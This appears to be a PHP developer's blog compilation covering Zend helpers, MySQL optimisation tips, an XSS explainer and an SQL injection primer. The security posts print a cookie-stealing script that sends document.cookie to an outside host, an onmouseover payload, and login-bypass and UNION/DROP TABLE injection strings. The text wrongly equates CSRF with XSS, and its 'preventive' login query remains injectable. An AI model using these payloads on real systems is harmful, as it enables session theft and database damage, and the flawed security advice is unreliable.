Zend Helpers: View Helpers and Controller Action Helper

To refer any php function, php.net is the best site but the same is not for Zend, The Zend Documentation is so poor. The best developers those who have given their best to the Zend Framework, but have not given enough to Zend Documentation.

Let’s move to the main topic. Today after a long time I am goin to Show you that how would you create “Zend Controller Action Helper”

Don’t get confuse between the Zend_View_Helper and Zend_Controller_Action_Helper. In one term both are the helpers but for different section as their name suggests. The first one is for View Helper and another is for the Zend Action controller Helper.

1. Zend View Helper:

Creating A Helper Class:

I have created the helper class named Myapp_View_Helper_Adminhelper the exist in the folder Myapp/view/helper/Adminhelper.php

class Myapp_View_Helper_Adminhelper{

public function adminhelper(){
return $this;

public function formatDate($date){
return date(‘d-m-Y h:i:s a’,strtotime($date));

The View Helper class must have function name same as the name of the  class name in small letters, in short kind of constructor that is not called using __construct() . So you may wonder that what if one want to create more than one helpers function in the same class. So I made a trick here is that I have returned the class object in the main function and so now I can call as many functions as I want defined in the helper class.


Class has been created properly but to tell Zend Please dont trow any errors when I call this View Helper class functions in view script, we have to add this path into view helpers path. If you have created _initView() function in your bootstrap.php modify it as below.

protected function _initView(){
// Initialize view
$view = new Zend_View();

// Add it to the ViewRenderer
$viewRenderer = Zend_Controller_Action_HelperBroker::getStaticHelper(‘ViewRenderer’);

// Adding View Helper Path
$view->addHelperPath(APPLICATION_PATH.’/views/helpers’, ‘Myapp_View_Helper’);

// Return it, so that it can be stored by the bootstrap
return $view;

If you dont have _initView() function in your bootstrap.php filen then just create any function that you like (e.g. _initViewHelpers)and inside that funciton the $view object as above and then add code mentioning adding the the View Helper path. That’s it. You can verify that view helpers path is included properly or not by using $view->getHelpersPath() function, which will return all helpers path.

Now we can call view helpers class function as…

<?php echo $this->adminhelper()->formatDate($requestedps->created_on); ?>

In above code $this->adminhelper()  return the object of the same class and hence you can call function formatDate() like as above.

This is what you just need to implement for view helpers. Zend has by default given some view helpers default that you can use it with out any hassle.

Now Lets Continue with action helpers:

2. Zend Controller Action Helper:

I was working in the admin panel coding. In the controller actions, in all the pages that was displaying the all records form the database table I was using zend pagination plugin. But I had to repeat small pagination code snippet in every action. I could have created one normal function in the controller class but this would be limited to that controller only and I wanted pagination to use in Front end also. It was the perfect time to start with Zend Controller Action.

I created one directory named actionhelpers inside the application folder, in short at same level where my views, controllers are. you can give any name what ever you like or you can put folder inside folder. The thing that matter is that as we had registered zend view helpers as same way we have to register Action Helpers and at that time you have to take care while registering it in you bootstrap.php file

class Myapp_Actionhelper_Common extends Zend_Controller_Action_Helper_Abstract{

protected $view;
public function pagination($result_set, $style = ‘digg’){

$page = $this->getRequest()->getParam(‘page’,1);
$records_per_page = $this->getRequest()->getParam(‘shown’,10);

$paginator = Zend_Paginator::factory($result_set);

$record_count = sizeof($result_set);

$view = $this->getView();
$view->page = $page;
$view->records_per_page = $records_per_page;
$view->numrows = $record_count;
$view->pagination_config = array(‘total_items’=>$record_count,’items_per_page’=>$records_per_page,’style’=>$style);
$view->records = $paginator;

public function getView(){

if(null !== $this->view){
return $this->view;

$controller = $this->getActionController();
$this->view = $controller->view;
return $this->view;

Now first you will have to tell zend where your action helper it so it doesn’t throw an error

public function _initActionHelpers(){

// Adding Action Helper Path
Zend_Controller_Action_HelperBroker::addPath(APPLICATION_PATH.’/actionhelpers’, ‘Myapp_Actionhelper’);

Here “APPLICATION_PATH” is the constant value and is the path string to my application folder.

Now in your controller action, you can call this function as

public someAction(){



where $request_res is the record set the i fetch from database table.




Abstraction and interfaces

Abstraction and interfaces are two very different tools. The are as close as hammers and drills. Abstract classes may have implemented methods, whereas interfaces have no implementation in themselves.

Abstract classes that declare all their methods as abstract are not interfaces with different names. One can implement multiple interfaces, but not extend multiple classes (or abstract classes).

The use of abstraction vs interfaces is problem specific and the choice is made during the design of software, not its implementation. In the same project you may as well offer an interface and a base (probably abstract) class as a reference that implements the interface. Why would you do that?

Let us assume that we want to build a system that calls different services, which in turn have actions. Normally, we could offer a method called execute that accepts the name of the action as a parameter and executes the action.

We want to make sure that classes can actually define their own ways of executing actions. So we create an interface IService that has the execute method. Well, in most of your cases, you will be copying and pasting the exact same code for execute.

We can create a reference implemention for a class named Service and implement the execute method. So, no more copying and pasting for your other classes! But what if you want to extend MySLLi?? You can implement the interface (copy-paste probably), and there you are, again with a service. Abstraction can be included in the class for initialisation code, which cannot be predefined for every class that you will write.

Hope this is not too mind-boggling and helps someone. Cheers,
Alexios Tsiaparas

From PHP.net

Eclipse Debugger error and solution

Strange but true!!! If you are using eclipse and any of your browser has utorrent plugin, The eclipse repeatedly throws the debugging error again and again until you close all browser having utorrent plug in installed.

Soln: Remover utorrent plugin from browser. I am talking about browser plugin not about utorrent program.

Top 20+ MySQL Best Practices

Database operations often tend to be the main bottleneck for most web applications today. It’s not only the DBA’s (database administrators) that have to worry about these performance issues. We as programmers need to do our part by structuring tables properly, writing optimized queries and better code. Here are some MySQL optimization techniques for programmers.

1. Optimize Your Queries For the Query Cache
Most MySQL servers have query caching enabled. It’s one of the most effective methods of improving performance, that is quietly handled by the database engine. When the same query is executed multiple times, the result is fetched from the cache, which is quite fast.
The main problem is, it is so easy and hidden from the programmer, most of us tend to ignore it. Some things we do can actually prevent the query cache from performing its task.
// query cache does NOT work
$r = mysql_query(“SELECT username FROM user WHERE signup_date >= CURDATE()”);

// query cache works!
$today = date(“Y-m-d”);
$r = mysql_query(“SELECT username FROM user WHERE signup_date >= ‘$today'”);
The reason query cache does not work in the first line is the usage of the CURDATE() function. This applies to all non-deterministic functions like NOW() and RAND() etc… Since the return result of the function can change, MySQL decides to disable query caching for that query. All we needed to do is to add an extra line of PHP before the query to prevent this from happening.

2. EXPLAIN Your SELECT Queries
Using the EXPLAIN keyword can give you insight on what MySQL is doing to execute your query. This can help you spot the bottlenecks and other problems with your query or table structures.
The results of an EXPLAIN query will show you which indexes are being utilized, how the table is being scanned and sorted etc…
Take a SELECT query (preferably a complex one, with joins), and add the keyword EXPLAIN in front of it. You can just use phpmyadmin for this. It will show you the results in a nice table. For example, let’s say I forgot to add an index to a column, which I perform joins on:

After adding the index to the group_id field:

Now instead of scanning 7883 rows, it will only scan 9 and 16 rows from the 2 tables. A good rule of thumb is to multiply all numbers under the “rows” column, and your query performance will be somewhat proportional to the resulting number.

3. LIMIT 1 When Getting a Unique Row
Sometimes when you are querying your tables, you already know you are looking for just one row. You might be fetching a unique record, or you might just be just checking the existence of any number of records that satisfy your WHERE clause.
In such cases, adding LIMIT 1 to your query can increase performance. This way the database engine will stop scanning for records after it finds just 1, instead of going thru the whole table or index.
// do I have any users from Alabama?

// what NOT to do:
$r = mysql_query(“SELECT * FROM user WHERE state = ‘Alabama'”);
if (mysql_num_rows($r) > 0) {
// …

// much better:
$r = mysql_query(“SELECT 1 FROM user WHERE state = ‘Alabama’ LIMIT 1”);
if (mysql_num_rows($r) > 0) {
// …

4. Index the Search Fields
Indexes are not just for the primary keys or the unique keys. If there are any columns in your table that you will search by, you should almost always index them.

As you can see, this rule also applies on a partial string search like “last_name LIKE ‘a%’”. When searching from the beginning of the string, MySQL is able to utilize the index on that column.
You should also understand which kinds of searches can not use the regular indexes. For instance, when searching for a word (e.g. “WHERE post_content LIKE ‘%apple%’”), you will not see a benefit from a normal index. You will be better off using mysql fulltext search or building your own indexing solution.

5. Index and Use Same Column Types for Joins
If your application contains many JOIN queries, you need to make sure that the columns you join by are indexed on both tables. This affects how MySQL internally optimizes the join operation.
Also, the columns that are joined, need to be the same type. For instance, if you join a DECIMAL column, to an INT column from another table, MySQL will be unable to use at least one of the indexes. Even the character encodings need to be the same type for string type columns.
// looking for companies in my state
$r = mysql_query(“SELECT company_name FROM users
LEFT JOIN companies ON (users.state = companies.state)
WHERE users.id = $user_id”);

// both state columns should be indexed
// and they both should be the same type and character encoding
// or MySQL might do full table scans

This is one of those tricks that sound cool at first, and many rookie programmers fall for this trap. You may not realize what kind of terrible bottleneck you can create once you start using this in your queries.
If you really need random rows out of your results, there are much better ways of doing it. Granted it takes additional code, but you will prevent a bottleneck that gets exponentially worse as your data grows. The problem is, MySQL will have to perform RAND() operation (which takes processing power) for every single row in the table before sorting it and giving you just 1 row.
// what NOT to do:
$r = mysql_query(“SELECT username FROM user ORDER BY RAND() LIMIT 1”);

// much better:

$r = mysql_query(“SELECT count(*) FROM user”);
$d = mysql_fetch_row($r);
$rand = mt_rand(0,$d[0] – 1);

$r = mysql_query(“SELECT username FROM user LIMIT $rand, 1”);
So you pick a random number less than the number of results and use that as the offset in your LIMIT clause.

7. Avoid SELECT *
The more data is read from the tables, the slower the query will become. It increases the time it takes for the disk operations. Also when the database server is separate from the web server, you will have longer network delays due to the data having to be transferred between the servers.
It is a good habit to always specify which columns you need when you are doing your SELECT’s.
// not preferred
$r = mysql_query(“SELECT * FROM user WHERE user_id = 1”);
$d = mysql_fetch_assoc($r);
echo “Welcome {$d[‘username’]}”;

// better:
$r = mysql_query(“SELECT username FROM user WHERE user_id = 1”);
$d = mysql_fetch_assoc($r);
echo “Welcome {$d[‘username’]}”;

// the differences are more significant with bigger result sets

8. Almost Always Have an id Field
In every table have an id column that is the PRIMARY KEY, AUTO_INCREMENT and one of the flavors of INT. Also preferably UNSIGNED, since the value can not be negative.
Even if you have a users table that has a unique username field, do not make that your primary key. VARCHAR fields as primary keys are slower. And you will have a better structure in your code by referring to all users with their id’s internally.
There are also behind the scenes operations done by the MySQL engine itself, that uses the primary key field internally. Which become even more important, the more complicated the database setup is. (clusters, partitioning etc…).
One possible exception to the rule are the “association tables”, used for the many-to-many type of associations between 2 tables. For example a “posts_tags” table that contains 2 columns: post_id, tag_id, that is used for the relations between two tables named “post” and “tags”. These tables can have a PRIMARY key that contains both id fields.

9. Use ENUM over VARCHAR
ENUM type columns are very fast and compact. Internally they are stored like TINYINT, yet they can contain and display string values. This makes them a perfect candidate for certain fields.
If you have a field, which will contain only a few different kinds of values, use ENUM instead of VARCHAR. For example, it could be a column named “status”, and only contain values such as “active”, “inactive”, “pending”, “expired” etc…
There is even a way to get a “suggestion” from MySQL itself on how to restructure your table. When you do have a VARCHAR field, it can actually suggest you to change that column type to ENUM instead. This done using the PROCEDURE ANALYSE() call. Which brings us to:

10. Get Suggestions with PROCEDURE ANALYSE()
PROCEDURE ANALYSE() will let MySQL analyze the columns structures and the actual data in your table to come up with certain suggestions for you. It is only useful if there is actual data in your tables because that plays a big role in the decision making.
For example, if you created an INT field for your primary key, however do not have too many rows, it might suggest you to use a MEDIUMINT instead. Or if you are using a VARCHAR field, you might get a suggestion to convert it to ENUM, if there are only few unique values.
You can also run this by clicking the “Propose table structure” link in phpmyadmin, in one of your table views.

Keep in mind these are only suggestions. And if your table is going to grow bigger, they may not even be the right suggestions to follow. The decision is ultimately yours.

11. Use NOT NULL If You Can
Unless you have a very specific reason to use a NULL value, you should always set your columns as NOT NULL.
First of all, ask yourself if there is any difference between having an empty string value vs. a NULL value (for INT fields: 0 vs. NULL). If there is no reason to have both, you do not need a NULL field. (Did you know that Oracle considers NULL and empty string as being the same?)
NULL columns require additional space and they can add complexity to your comparison statements. Just avoid them when you can. However, I understand some people might have very specific reasons to have NULL values, which is not always a bad thing.
From MySQL docs:
“NULL columns require additional space in the row to record whether their values are NULL. For MyISAM tables, each NULL column takes one bit extra, rounded up to the nearest byte.”

12. Prepared Statements
There are multiple benefits to using prepared statements, both for performance and security reasons.
Prepared Statements will filter the variables you bind to them by default, which is great for protecting your application against SQL injection attacks. You can of course filter your variables manually too, but those methods are more prone to human error and forgetfulness by the programmer. This is less of an issue when using some kind of framework or ORM.
Since our focus is on performance, I should also mention the benefits in that area. These benefits are more significant when the same query is being used multiple times in your application. You can assign different values to the same prepared statement, yet MySQL will only have to parse it once.
Also latest versions of MySQL transmits prepared statements in a native binary form, which are more efficient and can also help reduce network delays.
There was a time when many programmers used to avoid prepared statements on purpose, for a single important reason. They were not being cached by the MySQL query cache. But since sometime around version 5.1, query caching is supported too.
To use prepared statements in PHP you check out the mysqli extension or use a database abstraction layer like PDO.
view plaincopy to clipboardprint?
// create a prepared statement
if ($stmt = $mysqli->prepare(“SELECT username FROM user WHERE state=?”)) {

// bind parameters
$stmt->bind_param(“s”, $state);

// execute

// bind result variables

// fetch value

printf(“%s is from %s\n”, $username, $state);


13. Unbuffered Queries
Normally when you perform a query from a script, it will wait for the execution of that query to finish before it can continue. You can change that by using unbuffered queries.
There is a great explanation in the PHP docs for the mysql_unbuffered_query() function:
“mysql_unbuffered_query() sends the SQL query query to MySQL without automatically fetching and buffering the result rows as mysql_query() does. This saves a considerable amount of memory with SQL queries that produce large result sets, and you can start working on the result set immediately after the first row has been retrieved as you don’t have to wait until the complete SQL query has been performed.”
However, it comes with certain limitations. You have to either read all the rows or call mysql_free_result() before you can perform another query. Also you are not allowed to use mysql_num_rows() or mysql_data_seek() on the result set.

14. Store IP Addresses as UNSIGNED INT
Many programmers will create a VARCHAR(15) field without realizing they can actually store IP addresses as integer values. With an INT you go down to only 4 bytes of space, and have a fixed size field instead.
You have to make sure your column is an UNSIGNED INT, because IP Addresses use the whole range of a 32 bit unsigned integer.
In your queries you can use the INET_ATON() to convert and IP to an integer, and INET_NTOA() for vice versa. There are also similar functions in PHP called ip2long() and long2ip().
view plaincopy to clipboardprint?
$r = “UPDATE users SET ip = INET_ATON(‘{$_SERVER[‘REMOTE_ADDR’]}’) WHERE user_id = $user_id”;

15. Fixed-length (Static) Tables are Faster
When every single column in a table is “fixed-length”, the table is also considered “static” or “fixed-length”. Examples of column types that are NOT fixed-length are: VARCHAR, TEXT, BLOB. If you include even just 1 of these types of columns, the table ceases to be fixed-length and has to be handled differently by the MySQL engine.
Fixed-length tables can improve performance because it is faster for MySQL engine to seek through the records. When it wants to read a specific row in a table, it can quickly calculate the position of it. If the row size is not fixed, every time it needs to do a seek, it has to consult the primary key index.
They are also easier to cache and easier to reconstruct after a crash. But they also can take more space. For instance, if you convert a VARCHAR(20) field to a CHAR(20) field, it will always take 20 bytes of space regardless of what is it in.
By using “Vertical Partitioning” techniques, you can separate the variable-length columns to a separate table. Which brings us to:

16. Vertical Partitioning
Vertical Partitioning is the act of splitting your table structure in a vertical manner for optimization reasons.
Example 1: You might have a users table that contains home addresses, that do not get read often. You can choose to split your table and store the address info on a separate table. This way your main users table will shrink in size. As you know, smaller tables perform faster.
Example 2: You have a “last_login” field in your table. It updates every time a user logs in to the website. But every update on a table causes the query cache for that table to be flushed. You can put that field into another table to keep updates to your users table to a minimum.
But you also need to make sure you don’t constantly need to join these 2 tables after the partitioning or you might actually suffer performance decline.

17. Split the Big DELETE or INSERT Queries
If you need to perform a big DELETE or INSERT query on a live website, you need to be careful not to disturb the web traffic. When a big query like that is performed, it can lock your tables and bring your web application to a halt.
Apache runs many parallel processes/threads. Therefore it works most efficiently when scripts finish executing as soon as possible, so the servers do not experience too many open connections and processes at once that consume resources, especially the memory.
If you end up locking your tables for any extended period of time (like 30 seconds or more), on a high traffic web site, you will cause a process and query pileup, which might take a long time to clear or even crash your web server.
If you have some kind of maintenance script that needs to delete large numbers of rows, just use the LIMIT clause to do it in smaller batches to avoid this congestion.
view plaincopy to clipboardprint?
while (1) {
mysql_query(“DELETE FROM logs WHERE log_date <= ‘2009-10-01’ LIMIT 10000”);
if (mysql_affected_rows() == 0) {
// done deleting
// you can even pause a bit

18. Smaller Columns Are Faster
With database engines, disk is perhaps the most significant bottleneck. Keeping things smaller and more compact is usually helpful in terms of performance, to reduce the amount of disk transfer.
MySQL docs have a list of Storage Requirements for all data types.
If a table is expected to have very few rows, there is no reason to make the primary key an INT, instead of MEDIUMINT, SMALLINT or even in some cases TINYINT. If you do not need the time component, use DATE instead of DATETIME.
Just make sure you leave reasonable room to grow or you might end up like Slashdot.

19. Choose the Right Storage Engine
The two main storage engines in MySQL are MyISAM and InnoDB. Each have their own pros and cons.
MyISAM is good for read-heavy applications, but it doesn’t scale very well when there are a lot of writes. Even if you are updating one field of one row, the whole table gets locked, and no other process can even read from it until that query is finished. MyISAM is very fast at calculating SELECT COUNT(*) types of queries.
InnoDB tends to be a more complicated storage engine and can be slower than MyISAM for most small applications. But it supports row-based locking, which scales better. It also supports some more advanced features such as transactions.
MyISAM Storage Engine
InnoDB Storage Engine

20. Use an Object Relational Mapper
By using an ORM (Object Relational Mapper), you can gain certain performance benefits. Everything an ORM can do, can be coded manually too. But this can mean too much extra work and require a high level of expertise.
ORM’s are great for “Lazy Loading”. It means that they can fetch values only as they are needed. But you need to be careful with them or you can end up creating to many mini-queries that can reduce performance.
ORM’s can also batch your queries into transactions, which operate much faster than sending individual queries to the database.
Currently my favorite ORM for PHP is Doctrine. I wrote an article on how to install Doctrine with CodeIgniter.

21. Be Careful with Persistent Connections
Persistent Connections are meant to reduce the overhead of recreating connections to MySQL. When a persistent connection is created, it will stay open even after the script finishes running. Since Apache reuses it’s child processes, next time the process runs for a new script, it will reuse the same MySQL connection.
mysql_pconnect() in PHP
It sounds great in theory. But from my personal experience (and many others), this features turns out to be not worth the trouble. You can have serious problems with connection limits, memory issues and so on.
Apache runs extremely parallel, and creates many child processes. This is the main reason that persistent connections do not work very well in this environment. Before you consider using the mysql_pconnect() function, consult your system admin.

Cross Site Request Forgery (CSRF)

CSRF also known as XSS allows you to perform different actions directly in browser

When you go for interview for the post of Sr. Web Developer at that you must know about the security issues and latest technology news. I failed to give answer of such issues but then I realised that I must know about these issues.

Simply becoming master in coding does not mean that you are a good programmer. You can not ignore security issues.

CSRF also known as XSS is possible by Injecting HTML & Javascript code into the page. So when the HTML – Javascript injected page loads at that the injected code is executed. You must be thinking Is it possible? The answer is YES. It is possible in two ways:

1. Active Injection:

This Injection is possible by Feed back form or by comment form or blog posts. Hacker generally add HTML code containing Javascript snippet instead of his comment. So that form data are stored into the database.
So now when page containing these data are executed leads execution of javascript

e.g 1:
document.write(‘<img src = “http://mysite.com/code.php?params=&#8217; + document.cookie + ‘”>’);
in this sample we will passing logged member cookies to another website

Blogs users are allowed to add images. HTML enabled view of editing blog enables user to add code like
e.g 2:
<img src=”http://mysite.com/image.png”onmouseover=”javascript:DoSomethingMalicious();”/>

Such code makes possible to send the secrete and critical information to the hacker’s site.

2. Passive Injection:

This injection can be done with site search functionality. Exclaimed??? Yes. When one search for something on site at that search result comes and format of result like

Search result for “Happy Porter” or
Did you mean “Happy Porter”
where “Harry Porter” is the word searched. So hacker can add complete javascript code like above examples e.g 1 and e.g 2. and can send critical information to their server.

Passive Injection is more dangerous because it is only single time execution and site admin does not have any track for it.

XSS / CSRF attacks are generally performed in 4 phases:

Phase 1 : Injection phase
During this phase the hacker inject the html or css or javascript on the vulnerable web site.

Image: Phases of CSRF

Phase 2 : Code obtention phase
The user download a javascript file which is hosted on another web site (this phase is not mandatory, but more comfortable for the hacker, else he will have to send the entire payload during the phase

Phase 3 and 4:  Code execution
During these phases, the browser execute the Code. Usually, the first step consists to retrieve the session cookie, then the second, to  send a forged request to the web site. The request will be granted by the Web server because of the session cookies

So while coding always keep these points in your mind.
A Good Programmer’s must provide strong shield against Hackers.

God Bless Programmers

/2 a j a /7   ‘/.  /2 a w a /
(Rajan Y. Rawal)

SQL Injection

Sql Injection: A basic introduction about sql injection:

Almost completed one year in PHP coding even though i was not aware of technically. I have used the word ‘technically’ because i knew what can be done to prevent sql injection but not yet implemented actually.

But today by luck i got some time and figure out what actually is sql injection.

The sql injection can be used for anonymous log in fetching the database table details.
it can select table data, insert and many more.

Here I m giving you whole idea that how sql injection can be used to anonymous login.
If you get it thoroughly then use it for preventing your code and not for damaging other’s database. 🙂


1. SQL injection is possible beause mysql escape character ‘ (single quote).

here it is how its work
where you write select query see how this escape character ‘ (single quote) works magically.
$user = “user1”;
$pass = “pass1”;

$query = ‘select * from users where username=’$user’ and password=’$pass’;

echo $query;

//output: ‘select * from users where username=’user1’ and password=’pass1’;

The above query is simple sql query. where username and password parameters are enclosed by single quotes(i.e between ‘ and ‘).

Observe The Below parameters:

$user = “user1”;

$pass = “pass1’ OR 1=’1”;

$query = ‘select * from users where username=’$user’ and password=’$pass’;

echo $query;

//output: ‘select * from users where username=’user1’ and password=’pass1’ OR 1=’1’ ;

2. UNION : Mysql UNION functionality

Suppose your page test.php accepts parameter

e.g : test.php?id=2

so hackers can pass id value as

e.g :

test.php?id=-2 + union + SELECT * FROM Profiles WHERE ID=89                         or

tests.php?id=-2 + union + DROP TABLE Profiles

Preliminary steps to stop sql injection:1. Be specific to the coding especially for the page where your form action is going to react

e.g. check for your submit


…// remaining code


2. Be specific to use the form variables:
Be specific for the method and for getting the variable after the form is posted
if <form method=’post’> is used in the form
// if method=’post’
$name = $_POST[‘name’];
$password = $_POST[‘password’];
Similarly if you have used <form method=’get’> then use $_GET method.

note: Don’t use $_REQUEST, don’t be lazy. I am emphasizing this thing most

3. match exact count for row count where you are confirm for number if rows

e.g for login there can be only one row matching username and password
// if method=’post’
$name = $_POST[‘name’];
$password = $_POST[‘password’];

$query = ‘select * from users where name=’$name’ &&   password=’$password’;

$result = mysql_query($query);
$num_rows = mysql_num_rows($result);
if($num_rows==1){                                          // don’t use if($num_rows>0)
../ we are specific to count
4. Typecast for integer values
For e.g:
get variable id value in other page as
$id = (int)$_GET[‘id’];

Now I am sure that your sql injection concept would be clear little bit.
you can google for
=> mysql_real_escape_string // works only when connection is open
=> addcslashes // to add slashes to escape sequence characters

Hope you would explore more… Keep Coding

God Bless Developers